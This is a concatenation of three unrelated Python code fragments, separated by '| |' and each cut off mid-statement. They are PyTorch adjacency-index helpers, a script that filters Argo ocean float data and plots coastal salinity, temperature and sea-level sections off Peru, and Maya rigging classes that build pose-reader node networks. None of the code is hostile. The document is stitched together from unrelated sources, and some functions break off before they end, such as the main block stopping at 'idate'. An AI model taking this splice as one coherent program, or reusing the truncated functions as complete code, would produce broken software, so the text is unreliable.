ones = torch.ones(num_nodes, num_nodes)
eye = torch.eye(num_nodes, num_nodes)
triu_indices = (ones.triu() - eye).nonzero().t()
triu_indices = triu_indices[0] * num_nodes + triu_indices[1]
return triu_indices
def get_tril_indices(num_nodes):
"""Linear tril (lower triangular) indices."""
ones = torch.ones(num_nodes, num_nodes)
eye = torch.eye(num_nodes, num_nodes)
tril_indices = (ones.tril() - eye).nonzero().t()
tril_indices = tril_indices[0] * num_nodes + tril_indices[1]
return tril_indices
def get_offdiag_indices(num_nodes):
"""Linear off-diagonal indices."""
ones = torch.ones(num_nodes, num_nodes)
eye = torch.eye(num_nodes, num_nodes)
offdiag_indices = (ones - eye).nonzero().t()
offdiag_indices = offdiag_indices[0] * num_nodes + offdiag_indices[1]
return offdiag_indices
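# Illustrative note (comments only): for num_nodes = 3 the helpers above return
# linear indices into the flattened 3 x 3 adjacency matrix:
#   get_triu_indices(3)    -> tensor([1, 2, 5])
#   get_tril_indices(3)    -> tensor([3, 6, 7])
#   get_offdiag_indices(3) -> tensor([1, 2, 3, 5, 6, 7])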
def get_triu_offdiag_indices(num_nodes):
"""Linear triu (upper) indices w.r.t. vector of off-diagonal elements."""
triu_idx = torch.zeros(num_nodes * num_nodes)
triu_idx[get_triu_indices(num_nodes)] = 1.
| |
import datetime
import os
import argopy
import geopandas as gpd
import gsw
import numpy as np
import pandas as pd
import xarray as xr
from argopy import DataFetcher as ArgoDataFetcher
from argopy import IndexFetcher as ArgoIndexFetcher
from dmelon.ocean.argo import build_dl, launch_shell
from geopandas.tools import sjoin
def findPointsInPolys(pandas_df, shape_df):
# Create GeoDataFrame from pandas dataframe
argo_geodf = gpd.GeoDataFrame(
pandas_df,
geometry=gpd.points_from_xy(
pandas_df.longitude, pandas_df.latitude, crs="EPSG:4326"
),
)
# Make spatial join to filter out values outside the shapefile
pointInPolys = sjoin(argo_geodf, shape_df, op="within", how="inner")
return pointInPolys
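# Illustrative usage sketch (comments only; the column values and shapefile name
# are assumptions, not from this script):
#   import pandas as pd
#   floats_df = pd.DataFrame({"longitude": [-78.5], "latitude": [-10.2]})
#   coast_shape = gpd.read_file("peru_200nm.shp")
#   inside = findPointsInPolys(floats_df, coast_shape)
# `inside` keeps only the rows whose points fall within the shapefile polygons,
# with the polygon attributes appended by the inner spatial join.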
def maskVariableShape(variable, shape):
return variable.where(
shape.mask(variable.sel(lat=slice(-20, 0), lon=slice(-90, -70))) == 0
)
# godas_clim = xr.open_dataset("godas_clim_month.nc").pottmp
# godas_zero = godas_clim.isel(level=0)
# godas_zero["level"] = 0
# godas_clim = xr.concat([godas_zero, godas_clim], dim="level")
# godas_clim
import cmocean as cmo
# import cartopy.crs as ccrs
# import cartopy.feature as cfeature
import matplotlib.gridspec as gridspec
import matplotlib.pyplot as plt
import regionmask
# from dmelon.plotting import HQ_BORDER, format_latlon
### PLOT ###
def makePlot(
psal,
psal_raw,
temp,
temp_raw,
sla,
taux,
tauy,
ssta,
latest_date,
out_path="",
depth=850,
):
fig = plt.figure(constrained_layout=True, figsize=(8, 8), dpi=300)
spec = gridspec.GridSpec(ncols=1, nrows=4, figure=fig, height_ratios=[1, 1, 2, 2])
f_ax0 = fig.add_subplot(spec[3, :])
f_ax1 = fig.add_subplot(spec[2, :], sharex=f_ax0)
f_ax2 = fig.add_subplot(spec[1, :], sharex=f_ax0)
f_ax3 = fig.add_subplot(spec[0, :], sharex=f_ax0)
### SAL
plot_data_smooth = (
psal.interpolate_na(dim="LATITUDE")
.rolling(LATITUDE=5, center=True, min_periods=1)
.mean()
)
plot_data_smooth.plot.contourf(
x="LATITUDE",
vmin=33.5,
vmax=35.1,
cmap=cmo.cm.haline,
levels=33,
ax=f_ax0,
yincrease=False,
cbar_kwargs=dict(label="Salinity", pad=-0.09, ticks=np.arange(33.5, 35.2, 0.2)),
)
conts = plot_data_smooth.plot.contour(
x="LATITUDE",
vmin=33.5,
vmax=35.1,
levels=17,
ax=f_ax0,
colors="k",
linewidths=0.2,
yincrease=False,
)
lev = conts.levels.copy()
lev = lev[lev != 34.9]
f_ax0.clabel(conts, levels=lev, fontsize=7, inline_spacing=-7)
conts = plot_data_smooth.plot.contour(
x="LATITUDE",
levels=[33.8, 34.8, 35.1],
ax=f_ax0,
colors="k",
linewidths=0.8,
yincrease=False,
)
f_ax0.clabel(conts, fontsize=6.73, inline=True, inline_spacing=-7)
f_ax0.scatter(
psal_raw.LATITUDE,
np.full_like(psal_raw.LATITUDE, 0),
c="k",
s=5,
marker="s",
clip_on=False,
)
f_ax0.scatter(
psal_raw.LATITUDE,
np.full_like(psal_raw.LATITUDE, depth),
c="k",
s=5,
marker="s",
clip_on=False,
)
f_ax0.set_xlim(-20, -2)
f_ax0.set_ylim(depth, 0)
f_ax0.set_ylabel("Depth [m]")
f_ax0.set_xlabel("Latitude")
f_ax0.grid(ls="--", alpha=0.5)
### TEMP
plot_data_smooth = (
temp.interpolate_na(dim="LATITUDE")
.rolling(LATITUDE=5, center=True, min_periods=1)
.mean()
)
plot_data_smooth.plot.contourf(
x="LATITUDE",
vmin=4,
vmax=25,
cmap=cmo.cm.thermal,
levels=22,
ax=f_ax1,
yincrease=False,
cbar_kwargs=dict(label="Temperature [°C]", pad=-0.09),
)
conts = plot_data_smooth.plot.contour(
x="LATITUDE",
vmin=4,
vmax=25,
levels=22,
ax=f_ax1,
colors="k",
linewidths=0.2,
yincrease=False,
)
# conts = plot_data_smooth.plot.contour(
# x="LATITUDE",
# vmin=14,
# vmax=29,
# levels=[0],
# ax=f_ax1,
# colors="k",
# linewidths=1,
# yincrease=False,
# )
f_ax1.clabel(conts)
f_ax1.scatter(
temp_raw.LATITUDE,
np.full_like(temp_raw.LATITUDE, 0),
c="k",
s=5,
marker="s",
clip_on=False,
)
f_ax1.scatter(
temp_raw.LATITUDE,
np.full_like(temp_raw.LATITUDE, depth),
c="k",
s=5,
marker="s",
clip_on=False,
)
f_ax1.set_ylim(depth, 0)
f_ax1.set_ylabel("Depth [m]")
f_ax1.set_xlabel("Latitude")
f_ax1.grid(ls="--", alpha=0.5)
### REST
(sla.mean(dim=["time", "lon"]) * 100).plot(ax=f_ax2)
f_ax2.axhline(ls="--", c="k", lw=0.5)
f_ax2.set_yticks(np.arange(-5, 5.1, 2))
f_ax2.set_ylim(-5, 5)
f_ax2.set_ylabel("SLA [cm]")
f_ax2.set_xlabel("Latitude")
Q = f_ax2.quiver(
taux.lat[::2],
np.full_like(taux.lat, 0)[::2],
tauy.mean(dim=["time", "lon"])[::2] * 100,
taux.mean(dim=["time", "lon"])[::2] * -100,
units="xy",
scale_units="xy",
scale=1,
width=0.05,
)
f_ax2.quiverkey(
Q,
0.92,
0.85,
1,
r"$1x10^{-2} \frac{N}{m^2}$",
labelpos="E",
coordinates="axes",
fontproperties=dict(size=7),
labelsep=0.02,
)
f_ax2.text(0.885, 0.885, r"$\tau$", transform=f_ax2.transAxes)
f_ax2.grid(ls="--", alpha=0.5)
card_centerx = 1.06
card_centery = 0.5
da = 0.04
arrowprops = dict(arrowstyle="fancy", facecolor="black")
f_ax2.annotate(
"",
xy=(card_centerx + da, card_centery),
xytext=(card_centerx, card_centery),
arrowprops=arrowprops,
xycoords="axes fraction",
)
f_ax2.annotate(
"",
xy=(card_centerx - da, card_centery),
xytext=(card_centerx, card_centery),
arrowprops=arrowprops,
xycoords="axes fraction",
)
f_ax2.annotate(
"",
xy=(card_centerx, card_centery + da * 7),
xytext=(card_centerx, card_centery),
arrowprops=arrowprops,
xycoords="axes fraction",
)
f_ax2.annotate(
"",
xy=(card_centerx, card_centery - da * 7),
xytext=(card_centerx, card_centery),
arrowprops=arrowprops,
xycoords="axes fraction",
)
f_ax2.text(
card_centerx + da,
card_centery,
"N",
transform=f_ax2.transAxes,
va="center",
ha="left",
)
f_ax2.text(
card_centerx - da,
card_centery,
"S",
transform=f_ax2.transAxes,
va="center",
ha="right",
)
f_ax2.text(
card_centerx,
card_centery + da * 7,
"W",
transform=f_ax2.transAxes,
va="bottom",
ha="center",
)
f_ax2.text(
card_centerx,
card_centery - da * 7,
"E",
transform=f_ax2.transAxes,
va="top",
ha="center",
)
ssta.mean(dim=["time", "lon"]).rolling(
lat=10, min_periods=1, center=True
).mean().plot(ax=f_ax3)
f_ax3.set_ylabel("SSTA [°C]")
f_ax3.set_xlabel("Latitude")
f_ax3.set_yticks(np.arange(-3.5, 3.51, 1))
f_ax3.set_ylim(-3.5, 3.5)
f_ax3.axhline(ls="--", c="k", lw=0.5)
f_ax3.grid(ls="--", alpha=0.5)
props = dict(boxstyle="round", facecolor="wheat", alpha=0.2)
f_ax0.text(
0.03,
0.95,
"d",
transform=f_ax0.transAxes,
bbox=props,
verticalalignment="top",
horizontalalignment="right",
)
f_ax1.text(
0.03,
0.95,
"c",
transform=f_ax1.transAxes,
bbox=props,
verticalalignment="top",
horizontalalignment="right",
)
f_ax2.text(
0.03,
0.9,
"b",
transform=f_ax2.transAxes,
bbox=props,
verticalalignment="top",
horizontalalignment="right",
)
f_ax3.text(
0.03,
0.9,
"a",
transform=f_ax3.transAxes,
bbox=props,
verticalalignment="top",
horizontalalignment="right",
)
f_ax3.text(
0,
1.65,
"[a] OSTIA Sea Surface Temperature Anomaly\n"
"[b] (Line) DUACS L4 Sea Level Anomaly\n"
" (Arrows) ASCAT L3 Wind Stress Anomaly",
transform=f_ax3.transAxes,
verticalalignment="top",
horizontalalignment="left",
)
f_ax3.text(
0.6,
1.65,
"Clim: GODAS 1981-2010\n"
"Clim: DUACS L4 1993-2010\n"
"Clim: ASCAT - ERA adjusted 2008-2014\n",
transform=f_ax3.transAxes,
verticalalignment="top",
horizontalalignment="left",
)
f_ax0.text(
0,
-0.3,
"[c] ARGO Vertical Temperature\n" "[d] ARGO Vertical Practical Salinity",
transform=f_ax0.transAxes,
verticalalignment="top",
horizontalalignment="left",
)
# f_ax0.text(
# 0.6,
# -0.3,
# "Clim: IMARPE 1981-2020",
# transform=f_ax0.transAxes,
# verticalalignment="top",
# horizontalalignment="left",
# )
f_ax0.text(
0,
-0.15,
"Processing: IGP",
transform=f_ax0.transAxes,
verticalalignment="top",
horizontalalignment="left",
fontsize=9,
)
f_ax0.text(
1,
-0.15,
f"Latest Date: {pd.to_datetime(latest_date.data):%d-%b-%Y}",
transform=f_ax0.transAxes,
verticalalignment="top",
horizontalalignment="right",
fontsize=9,
)
f_ax0.text(
1,
-0.4,
f"*All plots shown are 30-day average of data points\n within 200nm from the coast",
transform=f_ax0.transAxes,
verticalalignment="top",
horizontalalignment="right",
fontsize=9,
)
fig.savefig(os.path.join(out_path, f"CoastMVar200nm_{depth}.png"))
fig.savefig(os.path.join(out_path, f"CoastMVar200nm_{depth}.jpeg"), dpi=200)
### PLOT ANOM ###
def makePlot_anom(
psal,
psal_raw,
temp,
temp_raw,
sla,
taux,
tauy,
ssta,
latest_date,
out_path="",
depth=850,
):
fig = plt.figure(constrained_layout=True, figsize=(8, 8), dpi=300)
spec = gridspec.GridSpec(ncols=1, nrows=4, figure=fig, height_ratios=[1, 1, 2, 2])
f_ax0 = fig.add_subplot(spec[3, :])
f_ax1 = fig.add_subplot(spec[2, :], sharex=f_ax0)
f_ax2 = fig.add_subplot(spec[1, :], sharex=f_ax0)
f_ax3 = fig.add_subplot(spec[0, :], sharex=f_ax0)
### SAL
plot_data_smooth = (
psal.interpolate_na(dim="LATITUDE")
.rolling(LATITUDE=5, center=True, min_periods=1)
.mean()
)
plot_data_smooth.plot.contourf(
x="LATITUDE",
vmin=33.5,
vmax=35.1,
cmap=cmo.cm.haline,
levels=33,
ax=f_ax0,
yincrease=False,
cbar_kwargs=dict(label="Salinity", pad=-0.09, ticks=np.arange(33.5, 35.2, 0.2)),
)
conts = plot_data_smooth.plot.contour(
x="LATITUDE",
vmin=33.5,
vmax=35.1,
levels=17,
ax=f_ax0,
colors="k",
linewidths=0.2,
yincrease=False,
)
lev = conts.levels.copy()
lev = lev[lev != 34.9]
f_ax0.clabel(conts, levels=lev, fontsize=7, inline_spacing=-7)
conts = plot_data_smooth.plot.contour(
x="LATITUDE",
levels=[33.8, 34.8, 35.1],
ax=f_ax0,
colors="k",
linewidths=0.8,
yincrease=False,
)
f_ax0.clabel(conts, fontsize=6.73, inline=True, inline_spacing=-7)
f_ax0.scatter(
psal_raw.LATITUDE,
np.full_like(psal_raw.LATITUDE, 0),
c="k",
s=5,
marker="s",
clip_on=False,
)
f_ax0.scatter(
psal_raw.LATITUDE,
np.full_like(psal_raw.LATITUDE, depth),
c="k",
s=5,
marker="s",
clip_on=False,
)
f_ax0.set_xlim(-20, -2)
f_ax0.set_ylim(depth, 0)
f_ax0.set_ylabel("Depth [m]")
f_ax0.set_xlabel("Latitude")
f_ax0.grid(ls="--", alpha=0.5)
### TEMP
plot_data_smooth = (
temp.interpolate_na(dim="LATITUDE")
.rolling(LATITUDE=5, center=True, min_periods=1)
.mean()
)
plot_data_smooth.plot.contourf(
x="LATITUDE",
vmin=-3,
vmax=3,
cmap="RdBu_r",
levels=13,
ax=f_ax1,
yincrease=False,
cbar_kwargs=dict(label="Temperature Anomaly [°C]", pad=-0.09),
)
conts = plot_data_smooth.plot.contour(
x="LATITUDE",
vmin=-3,
vmax=3,
levels=13,
ax=f_ax1,
colors="k",
linewidths=0.2,
yincrease=False,
)
conts = plot_data_smooth.plot.contour(
x="LATITUDE",
vmin=-3,
vmax=3,
levels=[0],
ax=f_ax1,
colors="k",
linewidths=1,
yincrease=False,
)
f_ax1.clabel(conts)
f_ax1.scatter(
temp_raw.LATITUDE,
np.full_like(temp_raw.LATITUDE, 0),
c="k",
s=5,
marker="s",
clip_on=False,
)
f_ax1.scatter(
temp_raw.LATITUDE,
np.full_like(temp_raw.LATITUDE, depth),
c="k",
s=5,
marker="s",
clip_on=False,
)
f_ax1.set_ylim(depth, 0)
f_ax1.set_ylabel("Depth [m]")
f_ax1.set_xlabel("Latitude")
f_ax1.grid(ls="--", alpha=0.5)
### REST
(sla.mean(dim=["time", "lon"]) * 100).plot(ax=f_ax2)
f_ax2.axhline(ls="--", c="k", lw=0.5)
f_ax2.set_yticks(np.arange(-5, 5.1, 2))
f_ax2.set_ylim(-5, 5)
f_ax2.set_ylabel("SLA [cm]")
f_ax2.set_xlabel("Latitude")
Q = f_ax2.quiver(
taux.lat[::2],
np.full_like(taux.lat, 0)[::2],
tauy.mean(dim=["time", "lon"])[::2] * 100,
taux.mean(dim=["time", "lon"])[::2] * -100,
units="xy",
scale_units="xy",
scale=1,
width=0.05,
)
f_ax2.quiverkey(
Q,
0.92,
0.85,
1,
r"$1x10^{-2} \frac{N}{m^2}$",
labelpos="E",
coordinates="axes",
fontproperties=dict(size=7),
labelsep=0.02,
)
f_ax2.text(0.885, 0.885, r"$\tau$", transform=f_ax2.transAxes)
f_ax2.grid(ls="--", alpha=0.5)
card_centerx = 1.06
card_centery = 0.5
da = 0.04
arrowprops = dict(arrowstyle="fancy", facecolor="black")
f_ax2.annotate(
"",
xy=(card_centerx + da, card_centery),
xytext=(card_centerx, card_centery),
arrowprops=arrowprops,
xycoords="axes fraction",
)
f_ax2.annotate(
"",
xy=(card_centerx - da, card_centery),
xytext=(card_centerx, card_centery),
arrowprops=arrowprops,
xycoords="axes fraction",
)
f_ax2.annotate(
"",
xy=(card_centerx, card_centery + da * 7),
xytext=(card_centerx, card_centery),
arrowprops=arrowprops,
xycoords="axes fraction",
)
f_ax2.annotate(
"",
xy=(card_centerx, card_centery - da * 7),
xytext=(card_centerx, card_centery),
arrowprops=arrowprops,
xycoords="axes fraction",
)
f_ax2.text(
card_centerx + da,
card_centery,
"N",
transform=f_ax2.transAxes,
va="center",
ha="left",
)
f_ax2.text(
card_centerx - da,
card_centery,
"S",
transform=f_ax2.transAxes,
va="center",
ha="right",
)
f_ax2.text(
card_centerx,
card_centery + da * 7,
"W",
transform=f_ax2.transAxes,
va="bottom",
ha="center",
)
f_ax2.text(
card_centerx,
card_centery - da * 7,
"E",
transform=f_ax2.transAxes,
va="top",
ha="center",
)
ssta.mean(dim=["time", "lon"]).rolling(
lat=10, min_periods=1, center=True
).mean().plot(ax=f_ax3)
f_ax3.set_ylabel("SSTA [°C]")
f_ax3.set_xlabel("Latitude")
f_ax3.set_yticks(np.arange(-3.5, 3.51, 1))
f_ax3.set_ylim(-3.5, 3.5)
f_ax3.axhline(ls="--", c="k", lw=0.5)
f_ax3.grid(ls="--", alpha=0.5)
props = dict(boxstyle="round", facecolor="wheat", alpha=0.2)
f_ax0.text(
0.03,
0.95,
"d",
transform=f_ax0.transAxes,
bbox=props,
verticalalignment="top",
horizontalalignment="right",
)
f_ax1.text(
0.03,
0.95,
"c",
transform=f_ax1.transAxes,
bbox=props,
verticalalignment="top",
horizontalalignment="right",
)
f_ax2.text(
0.03,
0.9,
"b",
transform=f_ax2.transAxes,
bbox=props,
verticalalignment="top",
horizontalalignment="right",
)
f_ax3.text(
0.03,
0.9,
"a",
transform=f_ax3.transAxes,
bbox=props,
verticalalignment="top",
horizontalalignment="right",
)
f_ax3.text(
0,
1.65,
"[a] OSTIA Sea Surface Temperature Anomaly\n"
"[b] (Line) DUACS L4 Sea Level Anomaly\n"
" (Arrows) ASCAT L3 Wind Stress Anomaly",
transform=f_ax3.transAxes,
verticalalignment="top",
horizontalalignment="left",
)
f_ax3.text(
0.6,
1.65,
"Clim: GODAS 1981-2010\n"
"Clim: DUACS L4 1993-2010\n"
"Clim: ASCAT - ERA adjusted 2008-2014\n",
transform=f_ax3.transAxes,
verticalalignment="top",
horizontalalignment="left",
)
f_ax0.text(
0,
-0.3,
"[c] ARGO Vertical Temperature Anomaly\n"
"[d] ARGO Vertical Practical Salinity",
transform=f_ax0.transAxes,
verticalalignment="top",
horizontalalignment="left",
)
f_ax0.text(
0.6,
-0.3,
"Clim: IMARPE 1981-2020",
transform=f_ax0.transAxes,
verticalalignment="top",
horizontalalignment="left",
)
f_ax0.text(
0,
-0.15,
"Processing: IGP",
transform=f_ax0.transAxes,
verticalalignment="top",
horizontalalignment="left",
fontsize=9,
)
f_ax0.text(
1,
-0.15,
f"Latest Date: {pd.to_datetime(latest_date.data):%d-%b-%Y}",
transform=f_ax0.transAxes,
verticalalignment="top",
horizontalalignment="right",
fontsize=9,
)
f_ax0.text(
1,
-0.4,
f"*All plots shown are 30-day average of data points\n within 200nm from the coast",
transform=f_ax0.transAxes,
verticalalignment="top",
horizontalalignment="right",
fontsize=9,
)
fig.savefig(os.path.join(out_path, f"CoastMVar200nm_anom_{depth}.png"))
fig.savefig(os.path.join(out_path, f"CoastMVar200nm_anom_{depth}.jpeg"), dpi=200)
if __name__ == "__main__":
### LOAD DATASETS ###
OUTPUT = "/data/users/service/ARGO/FLOATS/output/ARGO-plots"
# Date and region bounds
region = [-90, -70, -20, -2.5]
today = datetime.datetime.today()
idate | |
cmds.nodeType(input_value) == 'multiplyDivide':
new_multi.append(input_value)
if new_multi:
multi = new_multi
if not new_multi:
multi = []
attributes = self._get_message_attribute_with_prefix('multiply')
for attribute in attributes:
input_attr = attr.get_attribute_input('%s.%s' % (self.pose_control, attribute), node_only = True)
if input_attr:
inputs = attr.get_inputs(input_attr, node_only = True)
if not inputs:
multiplies.append(input_attr)
return multiplies
def set_input(self, attribute):
"""
Set the input into the weightInput of the no reader.
No readers need to have a connection specified that tells the pose when to turn on.
Args:
attribute (str): The node.attribute name of a connection to feed into the no reader.
"""
pass
def add_pose(self, pose_name):
self._connect_pose(pose_name)
pose_inst = get_pose_instance(pose_name, self.pose_gr)
if pose_inst.get_type() == 'no reader':
pose_inst.set_weight(1)
def get_pose_index(self, pose):
attributes = self._get_pose_string_attributes()
inc = 0
for attribute in attributes:
stored_pose = self._get_named_string_attribute(attribute)
if stored_pose == pose:
return inc
inc += 1
def remove_pose(self, pose_name):
index = self.get_pose_index(pose_name)
pose = self.get_pose(index)
if index is None:
return
if pose != pose_name:
return
attributes = self._get_pose_string_attributes()
attribute = attributes[index]
attr.disconnect_attribute('%s.%s' % (self.pose_control, attribute))
cmds.setAttr('%s.pose%s' % (self.pose_control, (index+1)), '', type = 'string')
self.refresh_multiply_connections()
def get_pose(self, index):
if index is None:
return
pose_attributes = self._get_pose_string_attributes()
if not pose_attributes:
return
if index > (len(pose_attributes)-1):
return
pose = cmds.getAttr('%s.%s' % (self.pose_control, pose_attributes[index]))
return pose
def get_poses(self):
pose_count = self._get_pose_count()
poses = []
for pose_index in range(0, pose_count):
poses.append(self.get_pose(pose_index))
return poses
def refresh_multiply_connections(self):
self._disconnect_multiplies()
self._connect_multiplies()
def attach(self, outputs = None):
#super(PoseNoReader, self).attach(outputs)
if outputs:
self.reconnect_weight_outputs(outputs)
self.refresh_multiply_connections()
self._hide_meshes()
if self.sub_detach_dict:
for key in self.sub_detach_dict:
pose = get_pose_instance(key)
pose.attach(self.sub_detach_dict[pose])
self.sub_detach_dict = {}
def detach(self):
#super(PoseNoReader, self).detach()
self._disconnect_multiplies()
outputs = self.disconnect_weight_outputs()
self._show_meshes()
return outputs
def set_weight(self, value):
"""
Set the weight for no readers in the combo.
No readers have connections specified.
If no connection is specified and connected, this can set the weight.
Args:
value (float): The value to set the weight to.
"""
poses = self.get_poses()
for pose in poses:
pose_inst = get_pose_instance(pose, self.pose_gr)
if pose_inst:
pose_type = pose_inst.get_type()
if pose_type == 'no reader':
pose_inst.set_weight(value)
class PoseCone(PoseBase):
"""
This type of pose reads from a joint or transform, for the defined angle of influence.
"""
def __init__(self, transform = None, description = 'pose'):
super(PoseCone, self).__init__(description)
if transform:
transform = transform.replace(' ', '_')
self.transform = transform
self.axis = 'X'
def _pose_type(self):
return 'cone'
def _get_color_for_axis(self):
if self.axis == 'X':
return 13
if self.axis == 'Y':
return 14
if self.axis == 'Z':
return 6
def _get_axis_rotation(self):
if self.axis == 'X':
return [0,0,-90]
if self.axis == 'Y':
return [0,0,0]
if self.axis == 'Z':
return [90,0,0]
def _get_twist_axis(self):
if self.axis == 'X':
return [0,1,0]
if self.axis == 'Y':
return [1,0,0]
if self.axis == 'Z':
return [1,0,0]
def _get_pose_axis(self):
if self.axis == 'X':
return [1,0,0]
if self.axis == 'Y':
return [0,1,0]
if self.axis == 'Z':
return [0,0,1]
def _create_pose_control(self):
pose_control = super(PoseCone, self)._create_pose_control()
self._position_control(pose_control)
if self.transform:
match = space.MatchSpace(self.transform, pose_control)
match.translation_rotation()
parent = cmds.listRelatives(self.transform, p = True)
if parent:
cmds.parentConstraint(parent[0], pose_control, mo = True)
cmds.setAttr('%s.parent' % pose_control, parent[0], type = 'string')
return pose_control
def _position_control(self, control = None):
if not control:
control = self.pose_control
control = rigs_util.Control(control)
control.set_curve_type('pin_point')
control.rotate_shape(*self._get_axis_rotation())
scale = self.scale + 5
control.scale_shape(scale,scale,scale)
control.color( self._get_color_for_axis() )
def _set_axis_vectors(self, pose_axis = None):
if not pose_axis:
pose_axis = self._get_pose_axis()
self._lock_axis_vector_attributes(False)
cmds.setAttr('%s.axisRotateX' % self.pose_control, pose_axis[0])
cmds.setAttr('%s.axisRotateY' % self.pose_control, pose_axis[1])
cmds.setAttr('%s.axisRotateZ' % self.pose_control, pose_axis[2])
twist_axis = self._get_twist_axis()
cmds.setAttr('%s.axisTwistX' % self.pose_control, twist_axis[0])
cmds.setAttr('%s.axisTwistY' % self.pose_control, twist_axis[1])
cmds.setAttr('%s.axisTwistZ' % self.pose_control, twist_axis[2])
self._lock_axis_vector_attributes(True)
def _lock_axis_vector_attributes(self, bool_value):
axis = ['X','Y','Z']
attributes = ['axisTwist', 'axisRotate']
for a in axis:
for attribute in attributes:
cmds.setAttr('%s.%s%s' % (self.pose_control, attribute, a), l = bool_value)
def _create_attributes(self, control):
super(PoseCone, self)._create_attributes(control)
cmds.addAttr(control, ln = 'translation', at = 'double', k = True, dv = 1)
cmds.addAttr(control, ln = 'rotation', at = 'double', k = True, dv = 1)
cmds.addAttr(control, ln = 'twistOffOn', at = 'double', k = True, dv = 1, min = 0, max = 1)
cmds.addAttr(control, ln = 'maxDistance', at = 'double', k = True, dv = 1)
cmds.addAttr(control, ln = 'maxAngle', at = 'double', k = True, dv = 90)
cmds.addAttr(control, ln = 'maxTwist', at = 'double', k = True, dv = 90)
title = attr.MayaEnumVariable('AXIS_ROTATE')
title.create(control)
pose_axis = self._get_pose_axis()
cmds.addAttr(control, ln = 'axisRotateX', at = 'double', k = True, dv = pose_axis[0])
cmds.addAttr(control, ln = 'axisRotateY', at = 'double', k = True, dv = pose_axis[1])
cmds.addAttr(control, ln = 'axisRotateZ', at = 'double', k = True, dv = pose_axis[2])
title = attr.MayaEnumVariable('AXIS_TWIST')
title.create(control)
twist_axis = self._get_twist_axis()
cmds.addAttr(control, ln = 'axisTwistX', at = 'double', k = True, dv = twist_axis[0])
cmds.addAttr(control, ln = 'axisTwistY', at = 'double', k = True, dv = twist_axis[1])
cmds.addAttr(control, ln = 'axisTwistZ', at = 'double', k = True, dv = twist_axis[2])
cmds.addAttr(control, ln = 'joint', dt = 'string')
if self.transform:
cmds.setAttr('%s.joint' % control, self.transform, type = 'string')
cmds.addAttr(control, ln = 'parent', dt = 'string')
self._lock_axis_vector_attributes(True)
#--- math nodes
def _create_distance_between(self):
distance_between = self._create_node('distanceBetween')
cmds.connectAttr('%s.worldMatrix' % self.pose_control,
'%s.inMatrix1' % distance_between)
if self.transform:
cmds.connectAttr('%s.worldMatrix' % self.transform,
'%s.inMatrix2' % distance_between)
return distance_between
def _create_multiply_matrix(self, moving_transform, pose_control):
multiply_matrix = self._create_node('multMatrix')
if moving_transform:
cmds.connectAttr('%s.worldMatrix' % moving_transform, '%s.matrixIn[0]' % multiply_matrix)
cmds.connectAttr('%s.worldInverseMatrix' % pose_control, '%s.matrixIn[1]' % multiply_matrix)
return multiply_matrix
def _create_vector_matrix(self, multiply_matrix, vector):
vector_product = self._create_node('vectorProduct')
cmds.connectAttr('%s.matrixSum' % multiply_matrix, '%s.matrix' % vector_product)
cmds.setAttr('%s.input1X' % vector_product, vector[0])
cmds.setAttr('%s.input1Y' % vector_product, vector[1])
cmds.setAttr('%s.input1Z' % vector_product, vector[2])
cmds.setAttr('%s.operation' % vector_product, 3)
return vector_product
def _create_angle_between(self, vector_product, vector):
angle_between = self._create_node('angleBetween')
cmds.connectAttr('%s.outputX' % vector_product, '%s.vector1X' % angle_between)
cmds.connectAttr('%s.outputY' % vector_product, '%s.vector1Y' % angle_between)
cmds.connectAttr('%s.outputZ' % vector_product, '%s.vector1Z' % angle_between)
cmds.setAttr('%s.vector2X' % angle_between, vector[0])
cmds.setAttr('%s.vector2Y' % angle_between, vector[1])
cmds.setAttr('%s.vector2Z' % angle_between, vector[2])
return angle_between
def _remap_value_angle(self, angle_between):
remap = self._create_node('remapValue', 'angle')
cmds.connectAttr('%s.angle' % angle_between, '%s.inputValue' % remap)
cmds.setAttr('%s.value[0].value_Position' % remap, 0)
cmds.setAttr('%s.value[0].value_FloatValue' % remap, 1)
cmds.setAttr('%s.value[1].value_Position' % remap, 1)
cmds.setAttr('%s.value[1].value_FloatValue' % remap, 0)
cmds.setAttr('%s.inputMax' % remap, 180)
return remap
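    # Note: the remapValue node above converts the measured angle into a falloff
    # weight: an angle of 0 maps to a weight of 1 and an angle of inputMax
    # (180 degrees) maps to 0, so the pose fades out as the joint rotates away.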
def _remap_value_distance(self, distance_between):
remap = self._create_node('remapValue', 'distance')
cmds.connectAttr('%s.distance' % distance_between, '%s.inputValue' % remap)
cmds.setAttr('%s.value[0].value_Position' % remap, 0)
cmds.setAttr('%s.value[0].value_FloatValue' % remap, 1)
cmds.setAttr('%s.value[1].value_Position' % remap, 1)
cmds.setAttr('%s.value[1].value_FloatValue' % remap, 0)
cmds.setAttr('%s.inputMax' % remap, 1)
return remap
def _fix_remap_value_distance(self):
input_value = attr.get_attribute_input('%s.translation' % self.pose_control, node_only = True)
key_input = attr.get_attribute_input('%s.input' % input_value)
if key_input:
return
if not cmds.objExists('remapValue3'):
distance = self._get_named_message_attribute('distanceBetween1')
remap = self._remap_value_distance(distance)
input_value = attr.get_attribute_input('%s.translation' % self.pose_control, node_only = True)
if input_value:
if cmds.nodeType(input_value).startswith('animCurve'):
cmds.connectAttr('%s.outValue' % remap, '%s.input' % input_value)
def _multiply_remaps(self, remap, remap_twist):
multiply = self._create_node('multiplyDivide')
cmds.connectAttr('%s.outValue' % remap, '%s.input1X' % multiply)
cmds.connectAttr('%s.outValue' % remap_twist, '%s.input2X' % multiply)
blend = self._create_node('blendColors')
cmds.connectAttr('%s.outputX' % multiply, '%s.color1R' % blend)
cmds.connectAttr('%s.outValue' % remap, '%s.color2R' % blend)
        cmds.connectAttr('%s.twistOffOn' % self.pose_control, '%s.blender' % blend)
return blend
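    # Note: the blendColors node above lets the twistOffOn attribute switch between
    # the combined angle * twist weight (color1R) and the angle-only weight (color2R),
    # so the twist contribution can be enabled or disabled per pose.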
def _create_pose_math_nodes(self, multiply_matrix, axis):
vector_product = self._create_vector_matrix(multiply_matrix, axis)
angle_between = self._create_angle_between(vector_product, axis)
if self._get_pose_axis() == axis:
cmds.connectAttr('%s.axisRotateX' % self.pose_control, '%s.input1X' % vector_product)
cmds.connectAttr('%s.axisRotateY' % self.pose_control, '%s.input1Y' % vector_product)
cmds.connectAttr('%s.axisRotateZ' % self.pose_control, '%s.input1Z' % vector_product)
cmds.connectAttr('%s.axisRotateX' % self.pose_control, '%s.vector2X' % angle_between)
cmds.connectAttr('%s.axisRotateY' % self.pose_control, '%s.vector2Y' % angle_between)
cmds.connectAttr('%s.axisRotateZ' % self.pose_control, '%s.vector2Z' % angle_between)
if self._get_twist_axis() == axis:
cmds.connectAttr('%s.axisTwistX' % self.pose_control, '%s.input1X' % vector_product)
